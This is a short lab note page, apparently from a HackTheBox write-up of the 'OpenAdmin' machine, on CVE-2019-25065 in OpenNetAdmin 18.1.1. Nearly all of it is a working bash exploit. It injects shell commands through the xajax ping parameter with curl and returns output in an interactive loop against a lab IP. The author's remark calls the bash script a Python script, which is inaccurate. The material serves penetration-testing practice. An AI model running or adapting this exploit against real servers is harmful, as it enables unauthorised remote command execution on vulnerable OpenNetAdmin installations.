InfoSec LAB

CVE-2019-25065

more about the vulnerability here

RCE Script

┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ cat 47691.sh

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
 
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
 
#!/bin/bash
 
URL="http://10.10.10.171/ona/"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

This is the Python script for remote code execution I just had to modify the URL variable to the target URL

InfoSec LAB

Explorer

OpenAdmin_CVE-2019-25065

CVE-2019-25065

RCE Script

Interactive Graph View

Table of Contents

Backlinks